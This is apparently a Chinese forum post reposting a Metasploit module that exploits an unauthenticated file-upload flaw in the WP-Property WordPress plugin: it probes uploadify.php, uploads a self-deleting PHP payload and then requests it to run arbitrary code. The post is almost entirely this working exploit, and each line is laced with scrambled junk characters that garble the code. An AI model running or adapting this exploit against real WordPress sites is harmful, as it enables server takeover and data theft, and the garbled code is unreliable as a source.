WordPress WP-Property PHP 文件上传漏洞
. ?# ]2 @' C1 b6 W$ U
$ J; M9 h! N: j J, h# [ ## # This file is part of the Metasploit Framework and may be subject to* l7 c% M" h) }* e8 k: G2 H& P
0 r) @9 D4 d7 v# L
# redistribution and commercial restrictions. Please see the Metasploit
1 I1 z1 B. L2 @/ h2 H) K D/ s5 B8 U0 R0 H$ d7 `7 _; P9 k: {
# Framework web site for more information on licensing and terms of use.
% F o# i# s/ Z! w0 Y$ B2 _( \' j5 s A" u+ z
# http://metasploit.com/framework/ ##, C$ D; O/ p% v- y8 a& |
3 K3 ?5 {( |5 a- I# U& i
) R0 I- u! E" K5 W! d* l- _3 i9 D ]1 p5 t" r! J7 u! E3 U: Q! w
. |. x( \" K8 c6 g( y0 Q5 L3 v
& G, C7 c$ q( y5 j4 qrequire 'msf/core'
! w+ i' x' {8 C5 O! _( L @2 P9 Trequire 'msf/core/exploit/php_exe', }6 i4 U* J4 w
+ G( u( J3 G- @7 hclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',+ S; f- z4 @: ?
'Description' => %q{
5 ?. W$ _* v* I; z4 QThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
$ w: M" |6 Z. f! ~! P0 V3 n$ @[
7 E. O w* N: G$ p' j% C'Sammy FORGIT', # initial discovery
2 a( n$ h1 l; X4 B, K' x/ U9 ]'James Fitts <fitts.james[at]gmail.com>' # metasploit module
) w1 Z$ m; D7 Z$ D/ H, s* b],6 ] ^! U3 e& L
'License' => MSF_LICENSE,
e/ R" `' Y5 r0 r. m. \6 i'References' =>- C w+ p, [0 r t& @) p
[1 v' {0 D6 ?* p* k; h N; @. A8 i, A
[ 'OSVDB', '82656' ],
f) n" v+ R) C! H- `+ a7 L[ 'BID', '53787' ],$ p5 q% U+ X8 q+ s' ]2 `
[ 'EDB', '18987'],
9 l% q0 y- ^6 c& u) y0 y6 [3 @[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]3 y4 G( V% L( k3 U- E N" @; u
], r( U4 }1 F! t' |
'Payload' =>3 v' @, @& f8 w d# m+ N r
{* {( }2 t0 L' ]2 E; X
'BadChars' => "\x00",
3 }0 y5 Y/ H+ U- S J},
# m: Y. d9 x2 n4 w) M0 f% E'Platform' => 'php',
; r6 ~% O5 l0 z2 P'Arch' => ARCH_PHP,
+ `% @2 N6 N: H- K! }$ b" W6 a'Targets' =>+ I" Z# L g6 |1 V( `1 R
[
" s9 Y2 c3 X. j, f6 S% ][ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],9 v, X1 \6 h$ l0 z6 m: N
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]! Q* z. A- K9 D r
],
3 X0 q1 D8 O, v" H2 S. p2 b+ R5 E'DefaultTarget' => 0,! R* t# d( D7 ?. \- k' _ P
'DisclosureDate' => 'Mar 26 2012'))
$ Y( g0 V' F1 U- @$ ~2 w6 p. p& Q6 o4 ?1 W5 D' X
register_options(
# n& X: b4 Z# Q! y[0 ^& J' s0 t2 y( K( I* s
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
9 i" b8 O7 G+ m% v% u& G+ F- |], self.class)
/ K, Q4 t% {/ Y3 xend' s/ O/ K$ z! F5 E7 l
) O3 B$ e, d8 l, g* H5 H2 G: Ndef check* T" u* g7 O/ }( P/ H
uri = target_uri.path
. E% V a' t3 quri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
) c5 Y9 {. |5 D5 W- V'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"$ u/ Q+ R* B1 Q/ C( ]' y/ h4 G
})
' c3 [$ g! y. w1 [
+ H+ `$ c* y) f6 C& l3 X0 dif not res or res.code != 200
8 z( k( }8 j# ^. N' u9 Xreturn Exploit::CheckCode::Unknown4 u0 ^6 m3 F6 P
end
. E. \4 d6 e) V2 b
; E% f8 C, x/ Q, w* Hreturn Exploit::CheckCode::Appears) m& V3 m( ?; P3 w
end
! r; a% X5 H4 m F2 {1 h0 a9 J
; G! i1 J$ S2 m: n' z& F/ pdef exploit
2 A6 [4 H* B& V4 t2 X1 p; euri = target_uri.path' Y1 L) \& F7 u
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true); C4 ~4 g' ~5 O" M0 S# @, Z
5 x! ^% `2 r- X- ?; D" o1 |* ndata = Rex::MIME::Message.new
Z: d( L7 j$ U6 ?3 }! Mdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
/ G. A" I& G- Cdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")& x) T, K" F X
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
6 S1 j% h3 j8 q' Z+ _
( {1 f1 n6 r, G9 N* ?print_status("#{peer} - Uploading payload #{@payload_name}")1 `0 S+ w, h/ b/ d9 \: k
res = send_request_cgi({
# \3 {5 S, A) E, t'method' => 'POST',2 c0 s4 t6 h) b- [ q- L& @
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",6 B, v. W7 z3 p0 ]! p: i- j
'ctype' => "multipart/form-data; boundary=#{data.bound}",
- d( u( B( d' N'data' => post_data# n2 A/ ?) U# q6 O3 {
}). z& l7 S, W5 |/ i+ t# l
! b" u( J2 T* h- @# Nif not res or res.code != 200 or res.body !~ /#{@payload_name}/
. y- s, {# G, ~2 t7 Kfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
6 Y1 ?: j& y6 ]/ oend
3 [$ N# H) s o1 L
$ l, A. f8 u; |4 t9 vupload_uri = res.body, k: d5 U5 A& g% x$ g
& [0 R7 o2 f( eprint_status("#{peer} - Executing payload #{@payload_name}")
0 o3 b4 h! y8 r2 ?res = send_request_raw({
" p8 e2 E- @, e1 O. f'uri' => upload_uri,, |8 q, z6 w6 N: i- P
'method' => 'GET'
& B5 n9 F6 ]5 d})
: |2 U o$ N; y3 {; n* L' xend2 y9 I* c# h6 E7 a( k. |2 E! E
end ?7 @! l9 o9 N1 e
2 u, r- e& {/ {3 X) G p" f
不要问我这写的是什么 怎么利用 我是说msf.
- X! W2 w5 `3 u4 e. w* j+ Y% C
0 t. P! C/ a; f: _7 G5 P |
发表于 2013-1-4 19:51:30
收藏
支持
反对